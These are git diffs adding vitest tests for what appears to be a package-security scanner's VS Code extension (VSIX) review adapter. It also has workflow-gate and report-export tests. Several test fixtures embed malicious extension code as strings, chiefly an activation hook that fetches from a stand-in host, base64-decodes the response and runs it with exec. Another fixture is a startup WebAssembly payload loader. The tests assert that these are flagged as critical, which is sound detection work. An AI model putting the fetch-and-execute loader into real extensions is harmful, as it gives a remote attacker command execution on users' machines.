     const manifest = buildVscodeReleaseManifest("example.remote-text-fetcher", "1.0.0", [
       { path: "dist/remote-text-fetcher-1.0.0.vsix", sha256: SHA },

--- a/test/vscode.test.mjs
+++ b/test/vscode.test.mjs
@@ -1,5 +1,6 @@
 import { describe, expect, test } from "vitest";
 import { createPackageDiff } from "../server/lib/review";
+import { readZipArchive } from "../server/lib/tar-parser.js";
 import {
   buildVscodeReleaseManifest,
   createVscodeExtensionReview,
@@ -8,6 +9,7 @@ import {
   vscodeAdapter,
   VSCODE_RULE_IDS,
 } from "../server/lib/adapters/vscode/index";
+import { buildZip } from "./helpers/archive-fixtures.mjs";
 
 const SHA = "ab".repeat(32);
 
@@ -90,6 +92,49 @@ describe("VS Code extension review adapter", () => {
     expect(review.ruleFindings.map((finding) => finding.ruleId)).toEqual(
       expect.arrayContaining([VSCODE_RULE_IDS.broadActivation]),
     );
+  });
+
+  test("reviews real VSIX ZIP bytes through the shared archive parser", async () => {
+    const vsix = buildZip([
+      { path: "[Content_Types].xml", body: '<?xml version="1.0"?><Types/>' },
+      { path: "extension.vsixmanifest", body: '<?xml version="1.0"?><PackageManifest/>' },
+      { path: "extension/package.json", body: extensionPackageJson() },
+      {
+        path: "extension/out/extension.js",
+        body: [
+          "const https = require('https');",
+          "const { exec } = require('child_process');",
+          "function activate() {",
+          "  https.get('https://example.invalid/payload', res => res.on('data', chunk => {",
+          "    const cmd = Buffer.from(String(chunk), 'base64').toString('utf8');",
+          "    exec(cmd);",
+          "  }));",
+          "}",
+        ].join("\n"),
+        deflate: true,
+      },
+    ]);
+    const files = await readZipArchive(vsix.buffer, 2_500, 25 * 1024 * 1024);
+    const manifest = buildVscodeReleaseManifest("example.remote-text-fetcher", "1.0.0", [
+      { path: "dist/remote-text-fetcher-1.0.0.vsix", sha256: SHA },
+    ]);
+    const review = createVscodeExtensionReview({
+      manifest,
+      artifact: { path: "dist/remote-text-fetcher-1.0.0.vsix", sha256: SHA, files },
+    });
+
+    expect(review.package).toEqual({ name: "example.remote-text-fetcher", version: "1.0.0" });
+    // Container metadata is stripped; only the extension payload is reviewed.
+    expect(review.fileCount).toBe(2);
+    expect(review.ruleFindings).toEqual(
+      expect.arrayContaining([
+        expect.objectContaining({
+          ruleId: VSCODE_RULE_IDS.startupRemoteCommand,
+          file: "out/extension.js",
+        }),
+      ]),
+    );
+    expect(review.risk).toBe("critical");
   });
 
   test("rejects duplicate normalized VSIX paths before trusting package.json", () => {

--- a/test/vscode.test.mjs
+++ b/test/vscode.test.mjs
@@ -1,7 +1,11 @@
 import { describe, expect, test } from "vitest";
+import { createPackageDiff } from "../server/lib/review";
 import {
   buildVscodeReleaseManifest,
   createVscodeExtensionReview,
+  isAllowedVscodeArtifactUrl,
+  pickVscodeBaselineVersion,
+  vscodeAdapter,
   VSCODE_RULE_IDS,
 } from "../server/lib/adapters/vscode/index";
 
@@ -349,6 +353,124 @@ describe("VS Code extension review adapter", () => {
     );
   });
 
+  test("uses a marketplace baseline artifact when no previousArtifact is supplied", async () => {
+    const manifest = buildVscodeReleaseManifest("example.remote-text-fetcher", "1.0.0", [
+      { path: "dist/remote-text-fetcher-1.0.0.vsix", sha256: SHA },
+    ]);
+    const adapterInput = vscodeAdapter.parseInput({
+      manifest,
+      artifact: artifact([
+        file(
+          "extension/package.json",
+          extensionPackageJson({
+            activationEvents: ["onCommand:remoteTextFetcher.run"],
+          }),
+        ),
+        {
+          ...file("extension/out/extension.js", "exports.activate = () => 'new';"),
+          sha256: "11",
+        },
+      ]),
+    });
+    const staged = await vscodeAdapter.acquireStaged({}, adapterInput, fakeVscodeBroker({}));
+    const baselineUrl =
+      "https://example.gallerycdn.vsassets.io/extensions/example/remote-text-fetcher/0.9.0/123/Microsoft.VisualStudio.Services.VSIXPackage";
+    const broker = fakeVscodeBroker({
+      versions: [
+        {
+          version: "1.0.0",
+          lastUpdated: "2026-06-01T00:00:00Z",
+          files: [
+            { assetType: "Microsoft.VisualStudio.Services.VSIXPackage", source: baselineUrl },
+          ],
+        },
+        {
+          version: "0.9.0",
+          lastUpdated: "2026-05-01T00:00:00Z",
+          files: [
+            { assetType: "Microsoft.VisualStudio.Services.VSIXPackage", source: baselineUrl },
+          ],
+        },
+      ],
+      downloadedFiles: [
+        file(
+          "extension/package.json",
+          extensionPackageJson({
+            version: "0.9.0",
+            activationEvents: ["onCommand:remoteTextFetcher.run"],
+          }),
+        ),
+        {
+          ...file("extension/out/extension.js", "exports.activate = () => 'old';"),
+          sha256: "22",
+        },
+      ],
+    });
+
+    const baseline = await vscodeAdapter.acquireBaseline({}, adapterInput, broker, staged);
+    expect(broker.downloads).toEqual([baselineUrl]);
+    expect(baseline.baseline).toMatchObject({
+      version: "0.9.0",
+      source: "latest-published",
+      reason: "newest-marketplace-version",
+    });
+    expect(baseline.artifact?.manifest?.version).toBe("0.9.0");
+    expect(createPackageDiff(baseline.artifact?.files ?? [], staged.artifact.files)).toEqual(
+      expect.arrayContaining([
+        expect.objectContaining({ path: "out/extension.js", status: "modified" }),
+      ]),
+    );
+  });
+
+  test("selects the newest allowed marketplace VSIX older than the candidate", () => {
+    const oldUrl =
+      "https://old.gallerycdn.vsassets.io/extensions/example/remote-text-fetcher/0.8.0/123/Microsoft.VisualStudio.Services.VSIXPackage";
+    const newestUrl =
+      "https://new.gallerycdn.vsassets.io/extensions/example/remote-text-fetcher/0.9.0/123/Microsoft.VisualStudio.Services.VSIXPackage";
+    expect(isAllowedVscodeArtifactUrl(newestUrl)).toBe(true);
+    expect(isAllowedVscodeArtifactUrl("https://example.invalid/payload.vsix")).toBe(false);
+    expect(
+      pickVscodeBaselineVersion(
+        [
+          {
+            version: "1.0.0",
+            lastUpdated: "2026-06-01T00:00:00Z",
+            files: [
+              { assetType: "Microsoft.VisualStudio.Services.VSIXPackage", source: newestUrl },
+            ],
+          },
+          {
+            version: "0.8.0",
+            lastUpdated: "2026-04-01T00:00:00Z",
+            files: [{ assetType: "Microsoft.VisualStudio.Services.VSIXPackage", source: oldUrl }],
+          },
+          {
+            version: "0.9.0",
+            lastUpdated: "2026-05-01T00:00:00Z",
+            files: [
+              { assetType: "Microsoft.VisualStudio.Services.VSIXPackage", source: newestUrl },
+            ],
+          },
+          {
+            version: "0.95.0",
+            lastUpdated: "2026-05-15T00:00:00Z",
+            files: [
+              {
+                assetType: "Microsoft.VisualStudio.Services.VSIXPackage",
+                source: "https://example.invalid/payload.vsix",
+              },
+            ],
+          },
+        ],
+        "1.0.0",
+      ),
+    ).toEqual({
+      version: "0.9.0",
+      url: newestUrl,
+      reason: "newest-marketplace-version",
+    });
+  });
+
   test("detects undeclared configuration reads through unscoped getConfiguration", () => {
     const manifest = buildVscodeReleaseManifest("example.remote-text-fetcher", "1.0.0", [
       { path: "dist/remote-text-fetcher-1.0.0.vsix", sha256: SHA },
@@ -380,3 +502,17 @@ describe("VS Code extension review adapter", () => {
     );
   });
 });
+
+function fakeVscodeBroker({ versions = [], downloadedFiles = [] }) {
+  return {
+    downloads: [],
+    async fetchExtensionVersions() {
+      return versions;
+    },
+    async downloadPublicArtifact({ url }) {
+      this.downloads.push(url);
+      return { files: downloadedFiles };
+    },
+    dispose() {},
+  };
+}

--- a/test/vscode.test.mjs
+++ b/test/vscode.test.mjs
@@ -280,4 +280,35 @@ describe("VS Code extension review adapter", () => {
       ]),
     );
   });
+
+  test("detects undeclared configuration reads through unscoped getConfiguration", () => {
+    const manifest = buildVscodeReleaseManifest("example.remote-text-fetcher", "1.0.0", [
+      { path: "dist/remote-text-fetcher-1.0.0.vsix", sha256: SHA },
+    ]);
+    const review = createVscodeExtensionReview({
+      manifest,
+      artifact: artifact([
+        file(
+          "extension/package.json",
+          extensionPackageJson({
+            activationEvents: ["onCommand:remoteTextFetcher.run"],
+          }),
+        ),
+        file(
+          "extension/out/extension.js",
+          "const vscode = require('vscode'); vscode.workspace.getConfiguration().get('agentService.url');",
+        ),
+      ]),
+    });
+
+    expect(review.ruleFindings).toEqual(
+      expect.arrayContaining([
+        expect.objectContaining({
+          ruleId: VSCODE_RULE_IDS.undeclaredConfigurationRead,
+          file: "out/extension.js",
+          evidence: "reads undeclared VS Code configuration agentService.url",
+        }),
+      ]),
+    );
+  });
 });

--- a/test/vscode.test.mjs
+++ b/test/vscode.test.mjs
@@ -17,6 +17,15 @@ function file(path, textSample) {
   };
 }
 
+function binary(path, size) {
+  return {
+    path,
+    size,
+    sha256: "00",
+    flags: ["binary"],
+  };
+}
+
 function artifact(files) {
   return {
     path: "dist/remote-text-fetcher-1.0.0.vsix",
@@ -90,6 +99,39 @@ describe("VS Code extension review adapter", () => {
     );
     expect(review.risk).toBe("critical");
     expect(review.package).toEqual({ name: "example.remote-text-fetcher", version: "1.0.0" });
+  });
+
+  test("detects startup WebAssembly loaders in a VSIX", () => {
+    const manifest = buildVscodeReleaseManifest("example.remote-text-fetcher", "1.0.0", [
+      { path: "dist/remote-text-fetcher-1.0.0.vsix", sha256: SHA },
+    ]);
+    const review = createVscodeExtensionReview({
+      manifest,
+      artifact: artifact([
+        file("extension/package.json", extensionPackageJson()),
+        file(
+          "extension/out/extension.js",
+          [
+            "const go = new Go();",
+            "async function activate() {",
+            "  const source = await WebAssembly.instantiateStreaming(fetch('./payload.wasm'), go.importObject);",
+            "  go.run(source.instance);",
+            "}",
+          ].join("\n"),
+        ),
+        binary("extension/out/payload.wasm", 824552),
+      ]),
+    });
+
+    expect(review.ruleFindings.map((finding) => finding.ruleId)).toEqual(
+      expect.arrayContaining([
+        VSCODE_RULE_IDS.broadActivation,
+        VSCODE_RULE_IDS.startupWasmLoader,
+        "code.dynamic-evaluation",
+        "file.native-artifact",
+      ]),
+    );
+    expect(review.risk).toBe("critical");
   });
 
   test("allows declared configuration reads and narrow activation", () => {

--- a/test/vscode.test.mjs
+++ b/test/vscode.test.mjs
@@ -1,0 +1,122 @@
+import { describe, expect, test } from "vitest";
+import {
+  buildVscodeReleaseManifest,
+  createVscodeExtensionReview,
+  VSCODE_RULE_IDS,
+} from "../server/lib/adapters/vscode/index";
+
+const SHA = "ab".repeat(32);
+
+function file(path, textSample) {
+  return {
+    path,
+    size: textSample.length,
+    sha256: "00",
+    flags: [],
+    textSample,
+  };
+}
+
+function artifact(files) {
+  return {
+    path: "dist/remote-text-fetcher-1.0.0.vsix",
+    sha256: SHA,
+    files,
+  };
+}
+
+function extensionPackageJson(overrides = {}) {
+  return JSON.stringify(
+    {
+      name: "remote-text-fetcher",
+      publisher: "example",
+      version: "1.0.0",
+      engines: { vscode: "^1.80.0" },
+      main: "./out/extension",
+      activationEvents: ["onStartupFinished"],
+      contributes: {
+        configuration: {
+          properties: {
+            "remoteTextFetcher.url": {
+              type: "string",
+            },
+          },
+        },
+      },
+      ...overrides,
+    },
+    null,
+    2,
+  );
+}
+
+describe("VS Code extension review adapter", () => {
+  test("detects startup remote command loader behavior in a VSIX", () => {
+    const manifest = buildVscodeReleaseManifest("example.remote-text-fetcher", "1.0.0", [
+      { path: "dist/remote-text-fetcher-1.0.0.vsix", sha256: SHA },
+    ]);
+    const review = createVscodeExtensionReview({
+      manifest,
+      artifact: artifact([
+        file("extension/package.json", extensionPackageJson()),
+        file(
+          "extension/out/extension.js",
+          [
+            "const vscode = require('vscode');",
+            "const https = require('https');",
+            "const { exec } = require('child_process');",
+            "function activate() {",
+            "  const url = vscode.workspace.getConfiguration('agentService').get('url');",
+            "  https.get(url, res => res.on('data', chunk => {",
+            "    const cmd = Buffer.from(String(chunk), 'base64').toString('utf8');",
+            "    exec(cmd);",
+            "  }));",
+            "}",
+          ].join("\n"),
+        ),
+      ]),
+    });
+
+    const ruleIds = review.ruleFindings.map((finding) => finding.ruleId).sort();
+    expect(ruleIds).toEqual(
+      expect.arrayContaining([
+        VSCODE_RULE_IDS.broadActivation,
+        VSCODE_RULE_IDS.startupRemoteCommand,
+        VSCODE_RULE_IDS.undeclaredConfigurationRead,
+        "code.process-execution",
+        "code.network-access",
+        "code.dynamic-evaluation",
+      ]),
+    );
+    expect(review.risk).toBe("critical");
+    expect(review.package).toEqual({ name: "example.remote-text-fetcher", version: "1.0.0" });
+  });
+
+  test("allows declared configuration reads and narrow activation", () => {
+    const manifest = buildVscodeReleaseManifest("example.remote-text-fetcher", "1.0.0", [
+      { path: "dist/remote-text-fetcher-1.0.0.vsix", sha256: SHA },
+    ]);
+    const review = createVscodeExtensionReview({
+      manifest,
+      artifact: artifact([
+        file(
+          "extension/package.json",
+          extensionPackageJson({
+            activationEvents: ["onCommand:remoteTextFetcher.run"],
+          }),
+        ),
+        file(
+          "extension/out/extension.js",
+          "const vscode = require('vscode'); vscode.workspace.getConfiguration('remoteTextFetcher').get('url');",
+        ),
+      ]),
+    });
+
+    expect(review.ruleFindings.map((finding) => finding.ruleId)).not.toEqual(
+      expect.arrayContaining([
+        VSCODE_RULE_IDS.broadActivation,
+        VSCODE_RULE_IDS.undeclaredConfigurationRead,
+      ]),
+    );
+  });
+});

--- a/test/vscode.test.mjs
+++ b/test/vscode.test.mjs
@@ -325,6 +325,69 @@ describe("VS Code extension review adapter", () => {
     );
   });
 
+  test("accepts capitalized extension names the Marketplace grandfathered in", () => {
+    const manifest = buildVscodeReleaseManifest("golang.Go", "0.42.0", [
+      { path: "dist/go-0.42.0.vsix", sha256: SHA },
+    ]);
+    const review = createVscodeExtensionReview({
+      manifest,
+      artifact: {
+        path: "dist/go-0.42.0.vsix",
+        sha256: SHA,
+        files: [
+          file(
+            "extension/package.json",
+            JSON.stringify({
+              name: "Go",
+              publisher: "golang",
+              version: "0.42.0",
+              engines: { vscode: "^1.80.0" },
+              activationEvents: ["onLanguage:go"],
+            }),
+          ),
+          file("extension/out/extension.js", "exports.activate = () => {};"),
+        ],
+      },
+    });
+
+    expect(review.package).toEqual({ name: "golang.Go", version: "0.42.0" });
+    expect(review.ruleFindings.map((finding) => finding.ruleId)).not.toEqual(
+      expect.arrayContaining([VSCODE_RULE_IDS.metadataMismatch]),
+    );
+  });
+
+  test("treats section-scoped reads of declared properties as declared", () => {
+    const manifest = buildVscodeReleaseManifest("example.remote-text-fetcher", "1.0.0", [
+      { path: "dist/remote-text-fetcher-1.0.0.vsix", sha256: SHA },
+    ]);
+    const review = createVscodeExtensionReview({
+      manifest,
+      artifact: artifact([
+        file(
+          "extension/package.json",
+          extensionPackageJson({
+            activationEvents: ["onCommand:remoteTextFetcher.run"],
+            contributes: {
+              configuration: {
+                properties: {
+                  "remoteTextFetcher.advanced.url": { type: "string" },
+                },
+              },
+            },
+          }),
+        ),
+        file(
+          "extension/out/extension.js",
+          "const vscode = require('vscode'); vscode.workspace.getConfiguration('remoteTextFetcher.advanced').get('url');",
+        ),
+      ]),
+    });
+
+    expect(review.ruleFindings.map((finding) => finding.ruleId)).not.toEqual(
+      expect.arrayContaining([VSCODE_RULE_IDS.undeclaredConfigurationRead]),
+    );
+  });
+
   test("allows declared configuration reads and narrow activation", () => {
     const manifest = buildVscodeReleaseManifest("example.remote-text-fetcher", "1.0.0", [
       { path: "dist/remote-text-fetcher-1.0.0.vsix", sha256: SHA },

--- a/test/vscode.test.mjs
+++ b/test/vscode.test.mjs
@@ -427,6 +427,8 @@ describe("VS Code extension review adapter", () => {
       "https://old.gallerycdn.vsassets.io/extensions/example/remote-text-fetcher/0.8.0/123/Microsoft.VisualStudio.Services.VSIXPackage";
     const newestUrl =
       "https://new.gallerycdn.vsassets.io/extensions/example/remote-text-fetcher/0.9.0/123/Microsoft.VisualStudio.Services.VSIXPackage";
+    const futureUrl =
+      "https://future.gallerycdn.vsassets.io/extensions/example/remote-text-fetcher/1.1.0/123/Microsoft.VisualStudio.Services.VSIXPackage";
     expect(isAllowedVscodeArtifactUrl(newestUrl)).toBe(true);
     expect(isAllowedVscodeArtifactUrl("https://example.invalid/payload.vsix")).toBe(false);
     expect(
@@ -437,6 +439,13 @@ describe("VS Code extension review adapter", () => {
             lastUpdated: "2026-06-01T00:00:00Z",
             files: [
               { assetType: "Microsoft.VisualStudio.Services.VSIXPackage", source: newestUrl },
+            ],
+          },
+          {
+            version: "1.1.0",
+            lastUpdated: "2026-06-15T00:00:00Z",
+            files: [
+              { assetType: "Microsoft.VisualStudio.Services.VSIXPackage", source: futureUrl },
             ],
           },
           {

--- a/test/vscode.test.mjs
+++ b/test/vscode.test.mjs
@@ -151,6 +151,47 @@ describe("VS Code extension review adapter", () => {
     expect(review.package).toEqual({ name: "example.remote-text-fetcher", version: "1.0.0" });
   });
 
+  test("detects startup remote command loaders in the browser entrypoint", () => {
+    const manifest = buildVscodeReleaseManifest("example.remote-text-fetcher", "1.0.0", [
+      { path: "dist/remote-text-fetcher-1.0.0.vsix", sha256: SHA },
+    ]);
+    const review = createVscodeExtensionReview({
+      manifest,
+      artifact: artifact([
+        file(
+          "extension/package.json",
+          extensionPackageJson({
+            browser: "./web/extension",
+          }),
+        ),
+        file("extension/out/extension.js", "exports.activate = () => {};"),
+        file(
+          "extension/web/extension.js",
+          [
+            "const https = require('https');",
+            "const { exec } = require('child_process');",
+            "function activate() {",
+            "  https.get('https://example.invalid/payload', res => res.on('data', chunk => {",
+            "    const cmd = Buffer.from(String(chunk), 'base64').toString('utf8');",
+            "    exec(cmd);",
+            "  }));",
+            "}",
+          ].join("\n"),
+        ),
+      ]),
+    });
+
+    expect(review.ruleFindings).toEqual(
+      expect.arrayContaining([
+        expect.objectContaining({
+          ruleId: VSCODE_RULE_IDS.startupRemoteCommand,
+          file: "web/extension.js",
+        }),
+      ]),
+    );
+    expect(review.risk).toBe("critical");
+  });
+
   test("detects startup WebAssembly loaders in a VSIX", () => {
     const manifest = buildVscodeReleaseManifest("example.remote-text-fetcher", "1.0.0", [
       { path: "dist/remote-text-fetcher-1.0.0.vsix", sha256: SHA },

--- a/test/vscode.test.mjs
+++ b/test/vscode.test.mjs
@@ -530,6 +530,25 @@ describe("VS Code extension review adapter", () => {
     );
   });
 
+  test("summarizeDetails surfaces the reviewed VSIX digest as a provenance block", async () => {
+    const manifest = buildVscodeReleaseManifest("example.remote-text-fetcher", "1.0.0", [
+      { path: "dist/remote-text-fetcher-1.0.0.vsix", sha256: SHA },
+    ]);
+    const adapterInput = vscodeAdapter.parseInput({
+      manifest,
+      artifact: artifact([file("extension/package.json", extensionPackageJson())]),
+    });
+    const staged = await vscodeAdapter.acquireStaged({}, adapterInput, fakeVscodeBroker({}));
+    // Provenance binds the report to the digest the gate recomputed from the
+    // immutable VSIX bytes, mirroring the npm/PyPI gates so an approved VSIX gate
+    // carries byte-continuity evidence the publish job can verify.
+    expect(vscodeAdapter.summarizeDetails(staged.details).provenance).toEqual({
+      ecosystem: "vscode",
+      mode: "workflow_gate",
+      artifacts: [{ path: "dist/remote-text-fetcher-1.0.0.vsix", kind: "vsix", sha256: SHA }],
+    });
+  });
+
   test("selects the newest allowed marketplace VSIX older than the candidate", () => {
     const oldUrl =
       "https://old.gallerycdn.vsassets.io/extensions/example/remote-text-fetcher/0.8.0/123/Microsoft.VisualStudio.Services.VSIXPackage";

--- a/test/vscode.test.mjs
+++ b/test/vscode.test.mjs
@@ -88,6 +88,28 @@ describe("VS Code extension review adapter", () => {
     );
   });
 
+  test("rejects duplicate normalized VSIX paths before trusting package.json", () => {
+    const manifest = buildVscodeReleaseManifest("example.remote-text-fetcher", "1.0.0", [
+      { path: "dist/remote-text-fetcher-1.0.0.vsix", sha256: SHA },
+    ]);
+
+    expect(() =>
+      createVscodeExtensionReview({
+        manifest,
+        artifact: artifact([
+          file(
+            "extension/package.json",
+            extensionPackageJson({
+              activationEvents: ["onCommand:remoteTextFetcher.run"],
+            }),
+          ),
+          file("extension/package.json", extensionPackageJson()),
+          file("extension/out/extension.js", "exports.activate = () => {};"),
+        ]),
+      }),
+    ).toThrow(/duplicate path package\.json/);
+  });
+
   test("detects startup remote command loader behavior in a VSIX", () => {
     const manifest = buildVscodeReleaseManifest("example.remote-text-fetcher", "1.0.0", [
       { path: "dist/remote-text-fetcher-1.0.0.vsix", sha256: SHA },

--- a/test/vscode.test.mjs
+++ b/test/vscode.test.mjs
@@ -192,6 +192,40 @@ describe("VS Code extension review adapter", () => {
     expect(review.risk).toBe("critical");
   });
 
+  test("detects startup remote command loaders in activation-reachable modules", () => {
+    const manifest = buildVscodeReleaseManifest("example.remote-text-fetcher", "1.0.0", [
+      { path: "dist/remote-text-fetcher-1.0.0.vsix", sha256: SHA },
+    ]);
+    const review = createVscodeExtensionReview({
+      manifest,
+      artifact: artifact([
+        file("extension/package.json", extensionPackageJson()),
+        file("extension/out/extension.js", "require('./loader'); exports.activate = () => {};"),
+        file(
+          "extension/out/loader.js",
+          [
+            "const https = require('https');",
+            "const { exec } = require('child_process');",
+            "https.get('https://example.invalid/payload', res => res.on('data', chunk => {",
+            "  const cmd = Buffer.from(String(chunk), 'base64').toString('utf8');",
+            "  exec(cmd);",
+            "}));",
+          ].join("\n"),
+        ),
+      ]),
+    });
+
+    expect(review.ruleFindings).toEqual(
+      expect.arrayContaining([
+        expect.objectContaining({
+          ruleId: VSCODE_RULE_IDS.startupRemoteCommand,
+          file: "out/loader.js",
+        }),
+      ]),
+    );
+    expect(review.risk).toBe("critical");
+  });
+
   test("detects startup WebAssembly loaders in a VSIX", () => {
     const manifest = buildVscodeReleaseManifest("example.remote-text-fetcher", "1.0.0", [
       { path: "dist/remote-text-fetcher-1.0.0.vsix", sha256: SHA },
@@ -220,6 +254,40 @@ describe("VS Code extension review adapter", () => {
         VSCODE_RULE_IDS.startupWasmLoader,
         "code.dynamic-evaluation",
         "file.native-artifact",
+      ]),
+    );
+    expect(review.risk).toBe("critical");
+  });
+
+  test("detects startup WebAssembly loaders in activation-reachable modules", () => {
+    const manifest = buildVscodeReleaseManifest("example.remote-text-fetcher", "1.0.0", [
+      { path: "dist/remote-text-fetcher-1.0.0.vsix", sha256: SHA },
+    ]);
+    const review = createVscodeExtensionReview({
+      manifest,
+      artifact: artifact([
+        file("extension/package.json", extensionPackageJson()),
+        file("extension/out/extension.js", "import './wasm.js'; exports.activate = () => {};"),
+        file(
+          "extension/out/wasm.js",
+          [
+            "const go = new Go();",
+            "async function load() {",
+            "  const source = await WebAssembly.instantiateStreaming(fetch('./payload.wasm'), go.importObject);",
+            "  go.run(source.instance);",
+            "}",
+          ].join("\n"),
+        ),
+        binary("extension/out/payload.wasm", 824552),
+      ]),
+    });
+
+    expect(review.ruleFindings).toEqual(
+      expect.arrayContaining([
+        expect.objectContaining({
+          ruleId: VSCODE_RULE_IDS.startupWasmLoader,
+          file: "out/wasm.js",
+        }),
       ]),
     );
     expect(review.risk).toBe("critical");

--- a/test/vscode.test.mjs
+++ b/test/vscode.test.mjs
@@ -200,6 +200,50 @@ describe("VS Code extension review adapter", () => {
     expect(review.package).toEqual({ name: "example.remote-text-fetcher", version: "1.0.0" });
   });
 
+  test("treats workspaceContains activation as broad workspace-open activation", () => {
+    const manifest = buildVscodeReleaseManifest("example.remote-text-fetcher", "1.0.0", [
+      { path: "dist/remote-text-fetcher-1.0.0.vsix", sha256: SHA },
+    ]);
+    const review = createVscodeExtensionReview({
+      manifest,
+      artifact: artifact([
+        file(
+          "extension/package.json",
+          extensionPackageJson({
+            activationEvents: ["workspaceContains:**/.env"],
+          }),
+        ),
+        file(
+          "extension/out/extension.js",
+          [
+            "const https = require('https');",
+            "const { exec } = require('child_process');",
+            "function activate() {",
+            "  https.get('https://example.invalid/payload', res => res.on('data', chunk => {",
+            "    const cmd = Buffer.from(String(chunk), 'base64').toString('utf8');",
+            "    exec(cmd);",
+            "  }));",
+            "}",
+          ].join("\n"),
+        ),
+      ]),
+    });
+
+    expect(review.ruleFindings).toEqual(
+      expect.arrayContaining([
+        expect.objectContaining({
+          ruleId: VSCODE_RULE_IDS.broadActivation,
+          evidence: "activationEvents includes workspaceContains:**/.env",
+        }),
+        expect.objectContaining({
+          ruleId: VSCODE_RULE_IDS.startupRemoteCommand,
+          file: "out/extension.js",
+        }),
+      ]),
+    );
+    expect(review.risk).toBe("critical");
+  });
+
   test("detects startup remote command loaders in the browser entrypoint", () => {
     const manifest = buildVscodeReleaseManifest("example.remote-text-fetcher", "1.0.0", [
       { path: "dist/remote-text-fetcher-1.0.0.vsix", sha256: SHA },

--- a/test/workers/scan-report-export.test.ts
+++ b/test/workers/scan-report-export.test.ts
@@ -202,6 +202,55 @@ describe("scan report JSON export", () => {
     expect(body.provenance).toEqual(provenance);
   });
 
+  test("surfaces the reviewed VSIX digest for a VS Code gate review", async () => {
+    const owner = await seedUser();
+    const db = createDb(env.DB);
+    const scanId = `scan_${crypto.randomUUID()}`;
+    const stageId = `stage-${scanId.slice(-12)}`;
+    await createScanJob(db, {
+      id: scanId,
+      stageId,
+      organizationId: owner.organizationId,
+      ownerUserId: owner.userId,
+    });
+    const provenance = {
+      ecosystem: "vscode",
+      mode: "workflow_gate",
+      artifacts: [
+        { path: "dist/remote-text-fetcher-1.0.0.vsix", kind: "vsix", sha256: "c".repeat(64) },
+      ],
+    };
+    await persistScan(db, {
+      id: scanId,
+      stageId,
+      organizationId: owner.organizationId,
+      ownerUserId: owner.userId,
+      packageJson: { name: "example.remote-text-fetcher", version: "1.0.0" },
+      risk: "low",
+      status: "complete",
+      summary: {
+        report: {
+          version: 1,
+          digest: "abc123",
+          digestAlgorithm: "sha256",
+          generatedAt: "2026-01-01T00:00:00.000Z",
+          rulesVersion: "1.8.0",
+        },
+        stagedPublish: { provenance, manifest: { package: "example.remote-text-fetcher" } },
+      },
+      ai: null,
+      files: [],
+      diff: [],
+      findings: [],
+      report: { version: 1, digest: "abc123" },
+    });
+
+    const res = await getReport(buildTestApp(owner), scanId);
+    expect(res.status).toBe(200);
+    const body = (await res.json()) as { provenance: typeof provenance | null };
+    expect(body.provenance).toEqual(provenance);
+  });
+
   test("omits provenance when any artifact entry is malformed", async () => {
     const owner = await seedUser();
     const db = createDb(env.DB);

--- a/test/workers/workflow-gate-vscode.test.ts
+++ b/test/workers/workflow-gate-vscode.test.ts
@@ -1,6 +1,13 @@
 import { createExecutionContext, env } from "cloudflare:test";
+import { generateKeyPairSync } from "node:crypto";
 import { describe, expect, test, vi } from "vitest";
+import { createDb } from "../../server/db/client";
+import { ensurePersonalOrganization } from "../../server/db/organizations";
+import * as schema from "../../server/db/schema";
+import { readGithubAppConfig } from "../../server/lib/github-app/config";
+import { createReleaseTarget, upsertInstallation } from "../../server/lib/github-app/persistence";
 import { validateReleaseTargetShape } from "../../server/lib/github-app/validation";
+import { prepareReleaseCandidatesForGate } from "../../server/lib/workflow-gates/prepare";
 import {
   classifyBundleArtifact,
   detectArchiveEcosystems,
@@ -166,6 +173,103 @@ describe("VS Code workflow-gate adapter", () => {
   });
 });
 
+// ── Integration: auto-detect VSIX bundle through the shared runner ────────────
+
+describe("prepareReleaseCandidatesForGate · vscode auto-detect", () => {
+  test("routes a .vsix to the vscode adapter via the ZIP sandbox", async () => {
+    const seeded = await seedAutoDetectGate({
+      installationExternalId: "9400",
+      repositoryId: 74001,
+      runId: 7001,
+    });
+    stubGithubFetch(7001, ["dist/remote-text-fetcher-1.0.0.vsix"]);
+    const loader = buildFormatLoaderMock({ zip: vscodeSandboxResult() });
+    const ctx = buildCtxWithGateway();
+    const bindings = configBindings();
+    const config = readGithubAppConfig(bindings);
+    const sandboxEnv = {
+      ...env,
+      ...bindings,
+      LOADER: loader.binding as unknown as WorkerLoader,
+    } as Cloudflare.Env;
+    const db = createDb(env.DB);
+
+    const result = await prepareReleaseCandidatesForGate(sandboxEnv, ctx, db, {
+      config,
+      organizationId: seeded.organizationId,
+      gateId: seeded.gateId,
+    });
+
+    expect(result.packages).toHaveLength(1);
+    expect(result.packages[0].candidate.ecosystem).toBe("vscode");
+    expect(result.packages[0].packageAdapter.id).toBe("vscode");
+    expect(result.packages[0].candidate.package).toEqual({
+      name: "example.remote-text-fetcher",
+      version: "1.0.0",
+    });
+    expect(loader.calls).toEqual(["zip"]);
+    vi.unstubAllGlobals();
+  });
+
+  test("fans a mixed npm + VSIX bundle into one candidate per ecosystem", async () => {
+    const seeded = await seedAutoDetectGate({
+      installationExternalId: "9401",
+      repositoryId: 74002,
+      runId: 7002,
+    });
+    stubGithubFetch(7002, ["dist/alpha-1.0.0.tgz", "dist/remote-text-fetcher-1.0.0.vsix"]);
+    const loader = buildFormatLoaderMock({
+      tgz: {
+        files: [
+          {
+            path: "package.json",
+            size: 20,
+            sha256: "00",
+            flags: [],
+            textSample: '{"name":"@scope/alpha","version":"1.0.0"}',
+          },
+        ],
+        packageJson: { name: "@scope/alpha", version: "1.0.0" },
+      },
+      zip: vscodeSandboxResult(),
+    });
+    const ctx = buildCtxWithGateway();
+    const bindings = configBindings();
+    const config = readGithubAppConfig(bindings);
+    const sandboxEnv = {
+      ...env,
+      ...bindings,
+      LOADER: loader.binding as unknown as WorkerLoader,
+    } as Cloudflare.Env;
+    const db = createDb(env.DB);
+
+    const result = await prepareReleaseCandidatesForGate(sandboxEnv, ctx, db, {
+      config,
+      organizationId: seeded.organizationId,
+      gateId: seeded.gateId,
+    });
+
+    const candidates = result.packages
+      .map((pkg) => ({
+        ecosystem: pkg.candidate.ecosystem,
+        adapter: pkg.packageAdapter.id,
+        ...pkg.candidate.package,
+      }))
+      .sort((a, b) => a.ecosystem.localeCompare(b.ecosystem));
+    expect(candidates).toEqual([
+      { ecosystem: "npm", adapter: "npm", name: "@scope/alpha", version: "1.0.0" },
+      {
+        ecosystem: "vscode",
+        adapter: "vscode",
+        name: "example.remote-text-fetcher",
+        version: "1.0.0",
+      },
+    ]);
+    expect(loader.calls.sort()).toEqual(["tgz", "zip"]);
+    vi.unstubAllGlobals();
+  });
+});
+
 interface SandboxResult {
